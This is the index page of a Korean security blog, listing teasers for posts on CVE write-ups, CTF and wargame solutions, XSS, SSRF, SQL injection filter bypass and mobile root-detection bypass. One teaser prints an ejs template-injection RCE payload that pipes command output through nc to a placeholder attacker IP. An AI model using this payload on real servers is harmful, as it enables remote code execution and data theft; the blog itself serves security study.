Home
glasses96
Cancel

CVE-2025-2945 - pgAdmin4 for RCE

CVE-2025-2945์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. What is pgAdmin4 pgAdmin4๋Š” postgresql์„ ์‰ฝ๊ฒŒ ๊ด€๋ฆฌํ•  ์ˆ˜ ์žˆ๋„๋ก ๋„์™€์ฃผ๋Š” ๋„๊ตฌ์ž…๋‹ˆ๋‹ค. pgAdmin4๋Š” Python, ReactJs, Javascript๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ pgAdmin์„ ๋งŒ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค. Electron์œผ๋กœ ๋งŒ๋“ค์–ด์ง„ Desktop ๋Ÿฐํƒ€์ž„์„ ํ†ตํ•ด ๊ฐœ๋ณ„ ์‚ฌ์šฉ์ž๊ฐ€...

25๋…„ ์ „์ž๊ธˆ์œต๊ธฐ๋ฐ˜์‹œ์„ค ์ฃผ์š” ๊ฐœ์ • ์‚ฌํ•ญ(์›น/๋ชจ๋ฐ”์ผ)

25๋…„ ์›น/๋ชจ๋ฐ”์ผ ์ „์ž๊ธˆ์œต๊ธฐ๋ฐ˜์‹œ์„ค ์ทจ์•ฝ์  ๋ถ„์„ ํ‰๊ฐ€์˜ ์ฃผ์š” ๊ฐœ์ •์‚ฌํ•ญ์„ ์•Œ์•„๋ด…์‹œ๋‹ค. ๋ฌด์ œํ•œ ์š”์ฒญ ํ—ˆ์šฉ AS-IS : ์ž๋™ํ™” ๊ณต๊ฒฉ TO-BE : ๋ฌด์ œํ•œ ์š”์ฒญ ํ—ˆ์šฉ ํ•ญ๋ชฉ ์ด๋ฆ„์— ๋”ฐ๋ฅธ ๋‚ด์šฉ ํ˜ผ์„  ๋ฐฉ์ง€๋ฅผ ์œ„ํ•ด ๋ณ€๊ฒฝ๋˜์—ˆ๋‹ค. ์ทจ์•ฝ์  ์„ค๋ช… ์‹œ์Šคํ…œ ์ž์› ๊ณ ๊ฐˆ, ๋น„์šฉ ๋ฐœ์ƒ ๋“ฑ ์„œ๋น„์Šค ์šด์˜์ƒ์— ์˜ํ–ฅ์„ ๋ฏธ์น˜๋Š” ๊ธฐ๋Šฅ์— ๋Œ€ํ•ด ๋ฐ˜๋ณต๋œ ํ˜ธ์ถœ ๊ธฐ๋Šฅ ์—ฌ๋ถ€๋ฅผ ์ ๊ฒ€ ํ•œ๋‹ค....

Front-End Security

ํ‹ฐ์˜ค๋ฆฌ์˜ OpenTRS : Securing the Front Lines: Protecting Front-End Applications from Overlooked Vulnerabilities ๋ฅผ ๋ณด๊ณ  ์š”์•ฝํ•ด ๋ณด์ž. Theori OpenTRS : Securing the Front Lines OpenTRS๋ฅผ ๋ณด๊ณ  ๋‚ด์šฉ์„ ์š”์•ฝํ•ด๋ณด๊ฒ ์Šต๋‹ˆ๋‹ค. Why...

Between security and usability

๋ณด์•ˆ๊ณผ ํŽธ์˜์„ฑ์— ๋Œ€ํ•œ ๋‚˜์˜ ์ƒ๊ฐ Background ์ด ๊ธ€์„ ์“ฐ๋Š” ์ด์œ ๋Š” ๋ณด์•ˆ ์—…๋ฌด๋ฅผ ํ•˜๋ฉด์„œ ์ƒ๊ธด ๋งŽ์€ ๊ณ ๋ฏผ๋“ค์ด ์žˆ์Šต๋‹ˆ๋‹ค. ๊ทธ ์ค‘ ํ•œ๊ฐ€์ง€๋Š” ๋ณด์•ˆ VS ํŽธ์˜์„ฑ ์–ด๋””๊นŒ์ง€ ํ—ˆ์šฉ๋˜์–ด์•ผ ํ•˜๋Š”๊ฐ€ ์ž…๋‹ˆ๋‹ค. Generative AI ๊ฐ€์žฅ ๋Œ€ํ‘œ์ ์ธ ์˜ˆ์‹œ๋กœ ์ƒ์„ฑํ˜• AI๋‹ค. ์š”์ฆ˜ GPT๋ฅผ ์•ˆ์“ฐ๋Š” ์‚ฌ๋žŒ์€ ์—†์„๊บผ๋ผ๊ณ  ์ƒ๊ฐํ•œ๋‹ค. ํ•˜์ง€๋งŒ ์—…๋ฌด๋ฅผ ๋ณด์กฐํ•˜๋Š”๋ฐ ์‚ฌ์šฉํ•˜๊ธฐ...

postgresql with Command Execution

postgresql ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•˜๋ฉด RCE๊ฐ€ ๊ฐ€๋Šฅํ•  ์ˆ˜๋„ ์žˆ์Šต๋‹ˆ๋‹ค. What is Postgresql postgresql์€ ์˜คํ”ˆ์†Œ์Šค ๊ด€๊ณ„ํ˜• ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๊ด€๋ฆฌ ์‹œ์Šคํ…œ(RDBMS)์ž…๋‹ˆ๋‹ค. ๋ฌด๋ฃŒ๋กœ ์‚ฌ์šฉ์ด ๊ฐ€๋Šฅํ•˜๋ฉฐ, ์•ˆ์ •์„ฑ๊ณผ ํ™•์žฅ์„ฑ์ด ์ข‹์€ ํ‰๊ฐ€๋ฅผ ๋ฐ›๊ณ ์žˆ๋‹ค๊ณ  ๊ณต์‹ํ™ˆํŽ˜์ด์ง€์—์„œ ์†Œ๊ฐœ๋ฅผ ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. How to Command Execution wi...

New Beginning

๊ทธ๋™์•ˆ ๋ฐ”์œ๋‹ค๋Š” ํ•‘๊ณ„๋กœ ๋ฏธ๋ฃจ์—ˆ๋˜ ๋ธ”๋กœ๊ทธ ๊ธ€์„ ๋‹ค์‹œ ํ•œ๋ฒˆ ์จ๋ณผ๊นŒ ํ•ฉ๋‹ˆ๋‹ค. 6 months 6๊ฐœ์›” ๊ฐ„ ๋งŽ์€ ๋ณ€ํ™”๊ฐ€ ์žˆ์—ˆ๊ณ  ๊ฐ„๋‹จํ•˜๊ฒŒ ์ ์–ด๋ณผ๊นŒ ํ•ฉ๋‹ˆ๋‹ค. git & Copilot vscode๋กœ ์‚ฌ์šฉํ•˜๋Š” git๊ณผ ์ฝ”ํŒŒ์ผ๋Ÿฟ์€ ์œ ์šฉํ•˜๊ณ  ํŽธ๋ฆฌํ•˜๊ฒŒ ์ž˜ ์‚ฌ์šฉํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. #Thanks BH ์ฝ”ํŒŒ์ผ๋Ÿฟ์€ ์›” 12$ ...

Take a careful look at the code

Hack The Box๋ฅผ ๋ฌธ์ œ๋ฅผ ํ’€๋˜ ์ค‘ ๋ณ„๊ฑฐ ์•„๋‹ˆ์˜€์ง€๋งŒ ๊ฝค ๊ณ ์ „ํ•œ ๋ถ€๋ถ„์— ๋Œ€ํ•ด์„œ ์ ์œผ๋ ค๊ณ  ํ•ฉ๋‹ˆ๋‹ค. What happening? admin๊ณ„์ •์œผ๋กœ ๋กœ๊ทธ์ธ์„ ํ•˜๋ฉด FLAG๋ฅผ ์ฃผ๋Š” ๋‹จ์ˆœํ•œ ๋ฌธ์ œ์˜€์Šต๋‹ˆ๋‹ค. ๊ณ„์ •์€ JWT ํ† ํฐ์œผ๋กœ ๊ด€๋ฆฌ๋˜์–ด ์žˆ์–ด None Attack๋“ฑ ๊ณผ ๊ฐ™์€ ๊ณต๊ฒฉ์€ ๋ถˆ๊ฐ€ํ–ˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ์ฝ”๋“œ์ฒ˜๋Ÿผ ํŒŒ๋ผ๋ฏธํ„ฐ(id,pw)์˜ ๊ฐœ์ˆ˜๊ฐ€ 2...

Hack The Box - headless

Hack The Box - Headless ๋ฌธ์ œ๋ฅผ ํ’€์–ด ๋ด…์‹œ๋‹ค. Port Scanning Port Scanning ๊ฒฐ๊ณผ๋Š” 22๋ฒˆ(SSH)์™€ 5000๋ฒˆ ํฌํŠธ๊ฐ€ ์—ด๋ ค์žˆ์Šต๋‹ˆ๋‹ค. XSS 5000๋ฒˆ ํฌํŠธ๋กœ ์ ‘๊ทผ ์‹œ ์›น ํŽ˜์ด์ง€๊ฐ€ ๋ณด์ž…๋‹ˆ๋‹ค. For questions ๋ฒ„ํŠผ์„ ๋ˆ„๋ฅด๋ฉด ์ด๋ฆ„, ํฐ๋ฒˆํ˜ธ, contents๋“ฑ์„ ์ ์–ด Submit์„ ํ•  ์ˆ˜...

Boom Boom Hell - Unintened Solve

2024 Line CTF์—์„œ ์›น ๋ฌธ์ œ์ธ Boom Boom Hell์„ ์–ธ์ธํ…ํ•˜์—ฌ ํ’€์ด๋ฅผ ์ ์–ด๋ณด๊ณ ์ž ํ•ฉ๋‹ˆ๋‹ค. Boom Boom Hell ์ค‘์š” ์ฝ”๋“œ์˜ ํ•ด์„์€ ์•„๋ž˜์™€ ๊ฐ™์Šต๋‹ˆ๋‹ค. /chall ์—”๋“œํฌ์ธํŠธ์— url ํŒŒ๋ผ๋ฏธํ„ฐ๋ฅผ ์ œ์–ดํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. if๋ฌธ 2๊ฐœ๋ฅผ ํ†ต๊ณผํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. url์˜ ํŒŒ๋ผ๋ฏธํ„ฐ์˜ ๊ธธ์ด๊ฐ€ escapeHTM...

Nginx off by slash

Nginx์˜ off by slash๋กœ ์ธํ•œ ๋ณด์•ˆ์„ค์ •์œผ๋กœ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์ ์— ๋Œ€ํ•ด ์•Œ์•„๋ด…์‹œ๋‹ค. off by slash off by slash๋Š” /๋กœ ๋‹ซ์ง€ ์•Š๋Š” ๊ฒƒ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค. nginx์˜ ์„ค์ • ํŒŒ์ผ์— /๋ฅผ ๋‹ซ์ง€ ์•Š์•˜์„ ๋•Œ ์–ด๋–ค ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š”์ง€ ์˜ˆ์ œ๋ฅผ ํ†ตํ•ด ์•Œ์•„๋ด…์‹œ๋‹ค. Alias LFI Misconfiguration ngi...

XSS with srcdoc

HTML5 ํƒœ๊ทธ๋ฅผ ํ†ตํ•ด Real World์—์„œ ๋ฐœ์ƒํ•œ XSS ์ทจ์•ฝ์ ์„ ์•Œ์•„๋ด…์‹œ๋‹ค. srcdoc <iframe> ํƒœ๊ทธ์˜ srcdoc ์†์„ฑ์€ <iframe> ์š”์†Œ์— ๋ณด์ผ ์›น ํŽ˜์ด์ง€์˜ HTML ์ฝ”๋“œ๋ฅผ ๋ช…์‹œํ•ฉ๋‹ˆ๋‹ค. srcdoc ์†์„ฑ์ด ๋ช…์‹œ๋˜์–ด ์žˆ๊ณ  ํ•ด๋‹น ๋ธŒ๋ผ์šฐ์ €๊ฐ€ srcdoc ์†์„ฑ์„ ์ง€์›ํ•˜๋ฉด, <iframe> ...

PHAR Deserialization Vulnerability

์ตœ๊ทผ์— ๋“œ๋ฆผํ•ต ๋ฌธ์ œ๋ฅผ Phar Deserialization ์ทจ์•ฝ์ ์„ ์•Œ๊ฒŒ๋˜์–ด์„œ ์ •๋ฆฌํ•˜๊ณ ์ž ํ•ฉ๋‹ˆ๋‹ค. What is PHAR & Deserialization PHAR What is phar? Phar archives are best characterized as a convenient way to group several files i...

HTTP 0.9, 1.0, 1.1, 2.0

์ตœ๊ทผ์— ์›Œ๊ฒŒ์ž„ ๋ฌธ์ œ๋ฅผ ํ’€๋‹ค๊ฐ€ HTTP ๋ฒ„์ „ ์ฐจ์ด๋กœ ์ธํ•œ ๋ฌธ์ œ๋ฅผ ํ’€์—ˆ์Šต๋‹ˆ๋‹ค. ์ด์— HTTP1.0, HTTP1.1, HTTP2.0์— ๋Œ€ํ•˜์—ฌ ๊ฐ„๋‹จํ•˜๊ฒŒ ์•Œ์•„๋ด…์‹œ๋‹ค. What is HTTP? HTTP(HyperText Transfer Protocol)๋Š” ์ธํ„ฐ๋„ท ์ƒ์—์„œ ์ •๋ณด๋ฅผ ์ฃผ๊ณ  ๋ฐ›์„ ์ˆ˜ ์žˆ๋Š” ํ”„๋กœํ† ์ฝœ์ž…๋‹ˆ๋‹ค. ์‹ ๋ขฐ์„ฑ์žˆ๋Š” ์—ฐ๊ฒฐ์„ ํ•˜๊ธฐ ์œ„ํ•ด ์ฃผ๋กœ T...

cURL with CTF

CTF๋‚˜ ์›Œ๊ฒŒ์ž„ ๋ฌธ์ œ๋ฅผ ํ’€ ๋•Œ ์‰˜ ๋ช…๋ น์–ด๋กœ /flag๋ฅผ ์‹คํ–‰์‹œํ‚ค๊ฑฐ๋‚˜, /flag.txt์™€ ๊ฐ™์€ ํŒŒ์ผ ๋‚ด์šฉ์„ ๊ฐ€์ ธ์™€์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฐ ์ƒํ™ฉ์—์„œ ์‰˜์„ ์—ฐ๊ฒฐํ•˜์ง€ ์•Š๊ณ  cURL๋ฅผ ์ด์šฉํ•˜๋Š” ์—ฌ๋Ÿฌ๊ฐ€์ง€ ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. What is Curl?? cURL์€ client URL ์ด๋ผ๋Š” ๋œป์„ ๊ฐ€์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ง€์›ํ•˜๋Š” ํ”„๋กœํ† ์ฝœ์„ ์ด์šฉํ•˜์—ฌ URL...

Base64 Principle

๋“œ๋ฆผํ•ต ๋ฌธ์ œ like64 ๋ฌธ์ œ๋ฅผ ํ’€๋‹ค ๊ถ๊ธˆํ–ˆ๋˜ ๋ถ€๋ถ„์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Base64 encoding & Decoding ์›๋ฆฌ๋ฅผ ์•Œ์•„๋ด…์‹œ๋‹ค. What is Base64 Base64๋Š” ascii ์˜์—ญ์˜ ๋ฌธ์ž๋“ค๋กœ ์ด๋ฃจ์–ด์ง„ ๋ฌธ์ž์—ด๋กœ ๋ณ€ํ™˜ํ•˜๋Š” ์ธ์ฝ”๋”ฉ ๊ธฐ์ˆ ์ž…๋‹ˆ๋‹ค. ์ „์ฒด์˜ ascii ์˜์—ญ์€ ์•„๋‹ˆ๋ฉฐ 2^6 -> 64๊ธ€์ž๋ฅผ ๊ฐ€์ง€๊ณ  ์ธ์ฝ”๋”ฉ์„ ํ•˜๋Š” ...

CSP Bypass with JSONP

CSP์— script-src์— JSONP API๋ฅผ ์ง€์›ํ•˜๋Š” ์„œ๋ฒ„๊ฐ€ ์žˆ์„ ๊ฒฝ์šฐ ์ด๋ฅผ ์ด์šฉํ•˜์—ฌ XSS๋ฅผ ํ•˜๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. What is JSONP JSONP๋Š” SOP(Same Origin Policy)์ •์ฑ…์„ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉํ•˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. JSONP๋Š” HTML ๋ฌธ์„œ์˜ script ํƒœ๊ทธ๋กœ ๋‹ค๋ฅธ ๋„๋ฉ”์ธ์„ ์š”์ฒญ ํ•  ์‹œ SOP ์ •์ฑ…์ด ์ ์šฉ๋˜์ง€...

URL Normalization with XSS

URL Normalization์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. ์ถ”๊ฐ€๋กœ URI Normalization์œผ๋กœ ์ธํ•œ javascript scheme ํ•„ํ„ฐ๋ง ์šฐํšŒ XSS Payload๋ฅผ ์•Œ์•„๋ด…์‹œ๋‹ค. ๋งˆ์ง€๋ง‰์œผ๋กœ๋Š” filename_XSS์—์„œ ๊ถ๊ธˆํ•œ ์ ์„ ์ฐพ์•„๋ณด์•˜์Šต๋‹ˆ๋‹ค. URL Normalization ๋ธŒ๋ผ์šฐ์ €๋Š” URL์„ ์‚ฌ์šฉํ•  ๋•Œ Normalization์„ ํ•ฉ๋‹ˆ...

AWS Instance Meta-data SSRF

AWS-SSRF๋ฅผ ์ฝ๊ณ  ์‹ค์Šตํ•ด๋ด…์‹œ๋‹ค. RCE ๊นŒ์ง„ ์•ˆํ•ด๋ดค๊ณ  SSRF ๊นŒ์ง€๋งŒ ๋”ฐ๋ผ ํ•ด๋ดค์Šต๋‹ˆ๋‹ค. Get AWS EC2 Meta-data AWS์˜ EC2 Instance Meta-data๋Š” ์‹คํ–‰ ์ค‘์ธ Instance๋ฅผ ๊ตฌ์„ฑ ๋˜๋Š” ๊ด€๋ฆฌํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋  ์ˆ˜ ์žˆ๋Š” Instance ๊ด€๋ จ ๋ฐ์ดํ„ฐ์ž…๋‹ˆ๋‹ค. ๋Œ€๋ถ€๋ถ„์˜ AWS EC2 Instance Meta-da...

๐Ÿ”ตโšช๏ธ๐Ÿ”ด ๊ฐ•๋“ฑ ์‹คํ™”....

๐Ÿ”ตโšช๏ธ๐Ÿ”ด ์นœ๊ตฌ๋“ค๊ณผ ์œ ๋‹ˆํผ๋„ ์‚ฌ๊ณ  ์‘์›๊ฐ€๋„ ๋ถ€๋ฅด๋ฉฐ ์ข‹์€ ์ถ”์–ต์„ ๋งŽ์ด ๋งŒ๋“ค๋ฉฐ K๋ฆฌ๊ทธ์— ๋น ์ง€๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ˆ˜์›์‚ผ์„ฑ์„ ์‘์›ํ•˜๋Š” ํŒฌ์œผ๋กœ์„œ ์ด๋ฒˆ์ฃผ ํ† ์š”์ผ์€ ์ฐธ์œผ๋กœ ๋งˆ์Œ์ด ์•„ํ”ˆ ํ•˜๋ฃจ์˜€์Šต๋‹ˆ๋‹ค. 12์œ„๋กœ ์ˆœ์œ„๋ฅผ ๋งˆ๋ฌด๋ฆฌ ํ•˜๋ฉฐ ๊ฒฐ๊ตญ ๋‹ค์ด๋ ‰ํŠธ ๊ฐ•๋“ฑ์„ ํ•˜๊ฒŒ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. 2๋ถ€๋ฅผ ๊ฐ€๋”๋ผ๋„ ์‘์›์„ ์•ˆํ•˜๋Š” ๊ฒƒ์€ ์•„๋‹ˆ์ง€๋งŒ ์ฐธ์œผ๋กœ ์•„์‰ฌ์›€์ด ๋งŽ๊ณ  ์•ˆํƒ€๊นŒ์šด ํ•œ ํ•ด ์˜€์Šต๋‹ˆ๋‹ค. ๋ช‡๋ช‡...

Javascript Asynchronous

javascript์—์„œ ๋น„๋™๊ธฐ์ฒ˜๋ฆฌ ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. javascript is synchronous ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋Š” hositing๋œ ์ดํ›„๋ถ€ํ„ฐ ์ฝ”๋“œ๊ฐ€ ํ•˜๋‚˜์”ฉ ์ฒ˜๋ฆฌ๋ฉ๋‹ˆ๋‹ค. hositing์ด๋ž€ var, function declartion๋“ฑ ์ž๋™์ ์œผ๋กœ ์œ„๋กœ ์˜ฌ๋ผ๊ฐ€๋Š” ๊ฒƒ ๊ทธ๋ ‡๊ธฐ ๋•Œ๋ฌธ์— ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ๋Š” ๋น„๋™๊ธฐ์ฒ˜๋ฆฌ๋ฅผ ์œ„ํ•ด callback, pr...

ejs RCE Payload

ejs์—์„œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ RCE payload ์ž…๋‹ˆ๋‹ค. Payload mainModule "process.mainModule.constructor._load('child_process').exec('{CMD}+|+nc+{attackerip}+{port})" mainModule "process.mainModule.require('chil...

Prototype Pollution

Prototype Pollution์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. Background Javascript์˜ ๊ฐ์ฒด ์ง€ํ–ฅ Javascript๋Š” ๊ฐ์ฒด ์ง€ํ–ฅ ์–ธ์–ด ๊ฐ์ฒด์ง€ํ–ฅ์–ธ์–ด์˜ class ๊ฐœ๋…์ด javascript์—๋Š” ์กด์žฌํ•˜์ง€ ์•Š์Œ โ†’ ์ƒ์† ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์ง€ ๋ชปํ•œ๋‹ค๋Š” ์˜๋ฏธ prototype์ด๋ผ๋Š” ๊ณ ์œ  ํŠน์„ฑ์„ ์ด์šฉํ•ด ์ƒ์† ๊ธฐ๋Šฅ์„ ๊ตฌํ˜„ EC...

Response Status Code(307, 308) with POST DATA

์›Œ๊ฒŒ์ž„์„ ๊ณต๋ถ€ํ•˜๋‹ค๊ฐ€ ์•Œ์•„๋‚ธ POST ๋ฐ์ดํ„ฐ๋ฅผ ํƒˆ์ทจ ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ด…์‹œ๋‹ค. Redirection Status Code HTTP ์ƒํƒœ์ฝ”๋“œ์—์„œ ๋ฆฌ๋‹ค์ด๋ ‰์…˜ ์ฝ”๋“œ๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ (300๋ฒˆ๋Œ€)์ž…๋‹ˆ๋‹ค. ์ด์ค‘์—์„œ 301, 302, 307, 308์— ๋Œ€ํ•ด ๊ฐ„๋žตํ•˜๊ฒŒ ์•Œ์•„๋ด…์‹œ๋‹ค. 301 Moved Permanently : ์š”์ฒญํ•œ ๋ฆฌ์†Œ์Šค์˜ UR...

SS-Leak with Code Injection

SS-Leak ๊ณต๊ฒฉ์— ๋Œ€ํ•ด ์•Œ์•„๋ด…์‹œ๋‹ค. Information Same-Site ์„ค์ •์œผ๋กœ ์ธํ•ด XS-Leak ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜๊ธฐ ์–ด๋ ต์Šต๋‹ˆ๋‹ค. XS-Search์„ ๊ณต๊ฒฉํ•˜๋ ค๋ฉด inline-script๋ฅผ ์ด์šฉํ•ด์•ผํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์ง€๋งŒ CSP ์„ค์ •์— ์˜ํ•ด์„œ ๋ถˆ๊ฐ€๋Šฅ ํ•œ ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. Example Code ์˜ˆ์‹œ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด CSP๊ฐ€ ์„ค์ •๋˜์–ด ์žˆ์–ด i...

XS-Search

Dreamhack ๊ฐ•์˜๋ฅผ ํ†ตํ•ด XS-Search ๊ณต๊ฒฉ์— ๋Œ€ํ•ด ์•Œ์•„๋ด…์‹œ๋‹ค. Differences XSS ์›น ๋ธŒ๋ผ์šฐ์ €์—์„œ SOP(Same-Origin Policy)์ •์ฑ…์œผ๋กœ ์ธํ•˜์—ฌ ์ผ๋ฐ˜์ ์œผ๋กœ๋Š” ๋‹ค๋ฅธ ์˜ค๋ฆฌ์ง„์— ์š”์ฒญ์„ ๋ณด๋‚ด๊ณ  ์‘๋‹ต์„ ๋ฐ›๋Š” ๊ฒƒ์€ ๋ถˆ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. XSS๋Š” ๊ณต๊ฒฉ ๋Œ€์ƒ ์˜ค๋ฆฌ์ง„์— ๋ฐ˜๋“œ์‹œ ๊ณต๊ฒฉ์ž์˜ ์ž…๋ ฅ์ด ๋“ค์–ด๊ฐ€ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฝ์ž…ํ•ด์•ผํ•˜๊ณ , ...

Privilege elevation by SQL Injection

์›Œ๊ฒŒ์ž„์„ ํ’€๋‹ค ๋ฐœ๊ฒฌํ•œ SQL Injetion์„ ํ†ตํ•œ ๊ถŒํ•œ์ƒ์Šน ๊ณต๊ฒฉ์„ ์•Œ์•„๋ด…์‹œ๋‹ค. ์‹ค๋ฌด์—์„œ๋„ ๋ฐœ๊ฒฌ ๊ฐ€๋Šฅ์„ฑ์ด ์กด์žฌํ•˜๊ธฐ์— ํ•ญ์ƒ ์—ด๋ฆฐ ์ƒ๊ฐ์„ ๊ฐ€์ ธ์•ผํ•ฉ๋‹ˆ๋‹ค. Attack Scenario ๊ณ„์ •์˜ ๊ถŒํ•œ์€ DB์— ์ €์žฅ๋˜์–ด ์žˆ์Œ ์ผ๋ฐ˜ ๊ณ„์ •์„ ์ƒ์„ฑํ•  ๋•Œ ์ž๋™์œผ๋กœ DB์— ์ผ๋ฐ˜ ๊ถŒํ•œ์ด ์ถ”๊ฐ€๋จ ์ฟผ๋ฆฌ ๊ตฌ์กฐ๋ฅผ ํŒŒ์•…(์ถ”์ธก)ํ•˜์—ฌ insert ๊ตฌ๋ฌธ์— SQL ...

SQL Injection Filtering Bypass

Mysql์—์„œ SQL Injection Filtering Bypass์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. Whitespace Filtering Bypass ๊ณต๋ฐฑ ๋ฌธ์ž ํ•„ํ„ฐ๋ง์€ %09, %0a, %0b, %0c, %0d, %a0, /**/ ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ฌธ์ž์—ด ์˜๋ฏธ ...

Integer Overflow

Dreamhack๋ฅผ ํ’€๋‹ค ๋ฐœ๊ฒฌํ•œ Integer Overflow์— ๋Œ€ํ•ด์„œ ์•Œ์•„๋ด…์‹œ๋‹ค. Integer Overflow Integer Overflow๋Š” ์ฃผ์–ด์ง„ ์ž๋ฆฟ์ˆ˜๋กœ ํ‘œํ˜„ํ•  ์ˆ˜ ์žˆ๋Š” ๋ฒ”์œ„(์ตœ๋Œ€๊ฐ’๋ณด๋‹ค ํฌ๊ฑฐ๋‚˜ ์ตœ์†Œ ํ‘œํ˜„ ๊ฐ€๋Šฅํ•œ ๊ฐ’๋ณด๋‹ค ๋‚ฎ์Œ)๋ฅผ ๋ฒ—์–ด๋‚˜๋Š” ์ˆซ์ž ๊ฐ’์„ ์ƒ์„ฑํ•˜๋ ค๊ณ  ์‹œ๋„ํ•  ๋•Œ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ๋Š” ๋ฌธ์ œ์ž…๋‹ˆ๋‹ค. Exam ์•„๋ž˜์˜ ์˜ˆ์‹œ ์ฝ”๋“œ๋ฅผ ๋ณด๋ฉด...

Rootbeer bypass

Rootbeer๋ผ๋Š” ๋ฃจํŒ… ํƒ์ง€ ์•ฑ์—์„œ ๊ฑธ๋ฆฐ ๋ฃจํŒ… ๋กœ์ง์„ ์šฐํšŒํ•ด์„œ bypass ํ•˜๋„๋ก ๋งŒ๋“ค์–ด๋ด…์‹œ๋‹ค.. Rooting Detect ์•ฑ์„ ์‹คํ–‰ ํ›„ ๋ฃจํŒ… ์ฒดํฌ๋ฅผ ํ•˜๊ฒŒ ๋˜๋ฉด ์•„๋ž˜์™€ ๊ฐ™์ด 12๊ฐœ์˜ ์ฒดํฌ ๋กœ์ง์—์„œ 7๊ฐœ์˜ ๋กœ์ง์ด ๋ฃจํŒ…์— ๊ฑธ๋ ธ์Šต๋‹ˆ๋‹ค. ๊ณต๋ถ€๋ฅผ ์œ„ํ•ด ๋ถ„์„ํ•˜์—ฌ ์šฐํšŒํ•ด ๋ด…์‹œ๋‹ค. Root Management Apps && Pot...

Vanitas - CVE-2018-13379

whitehat contest 2023์—์„œ ์ถœ์ œ๋œ ์›น Vanitas์—์„œ ๋‚˜์˜จ ์ทจ์•ฝ์ ์„ ์•Œ์•„๋ด…์‹œ๋‹ค. ํŒŒ์ผ์„ ์ฝ์–ด์™€ ๊ณ„์ • ์ •๋ณด๋ฅผ ๊ฐ€์ ธ์˜ค๋Š” CVE-2018-13379 ๋ถ€๋ถ„๋งŒ ์ง์ ‘ ๊ตฌํ˜„ ๋น„์Šทํ•˜๊ฒŒ ํ–ˆ์Šต๋‹ˆ๋‹ค. ๋ฌธ์ œ์—์„œ๋Š” ์›น์„œ๋ฒ„ ํŒŒ์ผ์ด ELF๋กœ ๋˜์–ด์žˆ์ง€๋งŒ ๊ฐ„๋‹จํ•˜๊ฒŒ exe ํŒŒ์ผ๋กœ ๋งŒ๋“ค์—ˆ์Šต๋‹ˆ๋‹ค. ๋ฌธ์ œ ์ฝ”๋“œ ๋ฌธ์ œ๋Š” ์•„๋ž˜์™€ ๊ฐ™์ด ๊ตฌ์„ฑ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. unpa...

uncrackable level 1

์˜ค๋žœ๋งŒ์— ๋ชจ๋ฐ”์ผ ํ›„ํ‚น์„ ๋ณต๊ธฐ ํ•˜๊ธฐ ์œ„ํ•ด uncrackable 1 ํ’€์ด๋ฅผ ํ•ด๋ด…์‹œ๋‹ค. Uncrackable 1 These are the UnCrackable Apps for Android and iOS, a collection of mobile reverse engineering challenges. These challenges are us...

Diff View with Ghidra

